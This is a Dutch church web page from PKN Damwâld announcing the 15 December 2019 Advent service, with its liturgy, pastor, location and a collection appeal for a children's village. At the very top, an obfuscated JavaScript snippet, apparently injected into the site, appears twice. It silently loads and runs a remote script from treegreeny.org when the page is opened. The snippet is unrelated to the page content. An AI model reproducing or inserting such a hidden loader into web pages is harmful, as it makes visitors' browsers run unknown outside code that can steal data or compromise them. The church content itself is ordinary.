;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 15 december 2019 9:30 uur - PKN Damwâld
zondag 15 december 2019
09:30 uur
3e Advent

Kerkdienst zondag 15 december 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Ivo van Hijum
Mededeling:3e Advent
Liturgie
lied voor de dienst Gezang 124 : 1 en 3
Welkomstwoord
We zingen: Elb 188
Stil Gebed, Votum en Groet
Kaars aansteken
Adventproject
We zingen: Projectlied op de wijs van “Jezus is de goede Herder, Jezus Hij is overal”
Wetslezing .
We zingen: psalm 27 : 1 en 7
Gebed
We lezen: Jes. 8 : 11- 9 : 6
We zingen: Psalm 121 : 1 en 2
Preek .
We zingen: Gezang 130 in het Fries
Collecte
Dankgebed en voorbede
Slotlied Gezang 26 : 1 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Een stabiel thuis voor kinderen

Kinderen in de Knel - Een stabiel thuis voor kinderen
In Nederland kunnen door allerlei problemen 45.000 kinderen niet meer thuis wonen. In Jeugddorp De Glind worden 120 kinderen en jongeren opgevangen in een gezinshuis. In de Glind gaat men uit van de helende kracht van het gewone gezinsleven. Een gezinshuis wordt gerund door ouders die er vierentwintig uur per dag en zeven dagen per week zijn. Het biedt kinderen structuur, continuïteit in zorg en veiligheid binnen de omgeving in een bestaan gezin. Daar kunnen ze werken aan hun toekomst! Met de opbrengst wil Kerk in Actie kinderen in Nederland licht op hun pad brengen, op weg naar een goede toekomst.

Tweede collecte: Kerk
Uitganscollecte: Kerk